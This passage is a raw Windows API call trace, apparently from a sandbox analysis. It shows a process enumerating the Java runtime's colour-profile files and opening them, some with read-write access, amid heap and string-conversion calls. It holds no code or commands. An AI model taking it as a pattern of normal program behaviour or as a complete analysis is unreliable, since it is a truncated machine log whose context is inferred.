cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 57 [0094.675] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.675] GetFileType (hFile=0x368) returned 0x1 [0094.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0094.675] CloseHandle (hObject=0x368) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.676] AreFileApisANSI () returned 1 [0094.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0094.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0094.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 57 [0094.676] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x414)) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4302a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="PYCC.pf", cAlternateFileName="")) returned 1 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0094.677] AreFileApisANSI () returned 1 [0094.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf", lpUsedDefaultChar=0x0) returned 51 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0094.677] AreFileApisANSI () returned 1 [0094.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x464a8 [0094.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 51 [0094.678] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.678] GetFileType (hFile=0x368) returned 0x1 [0094.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0094.678] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.678] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.678] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.678] CloseHandle (hObject=0x368) returned 1 [0094.678] AreFileApisANSI () returned 1 [0094.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0094.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 51 [0094.679] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.679] GetFileType (hFile=0x368) returned 0x1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0094.679] CloseHandle (hObject=0x368) returned 1 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.679] AreFileApisANSI () returned 1 [0094.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46b38 [0094.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 51 [0094.680] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4302a)) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sRGB.pf", cAlternateFileName="")) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0094.680] AreFileApisANSI () returned 1 [0094.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf", lpUsedDefaultChar=0x0) returned 51 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.681] AreFileApisANSI () returned 1 [0094.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46668 [0094.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 51 [0094.681] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.681] GetFileType (hFile=0x368) returned 0x1 [0094.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0094.681] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.681] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.682] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.682] CloseHandle (hObject=0x368) returned 1 [0094.682] AreFileApisANSI () returned 1 [0094.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46278 [0094.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 51 [0094.682] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.682] GetFileType (hFile=0x368) returned 0x1 [0094.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0094.682] CloseHandle (hObject=0x368) returned 1 [0094.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.683] AreFileApisANSI () returned 1 [0094.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ac8 [0094.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf") returned 51 [0094.683] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48)) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.683] HeapFree (in: 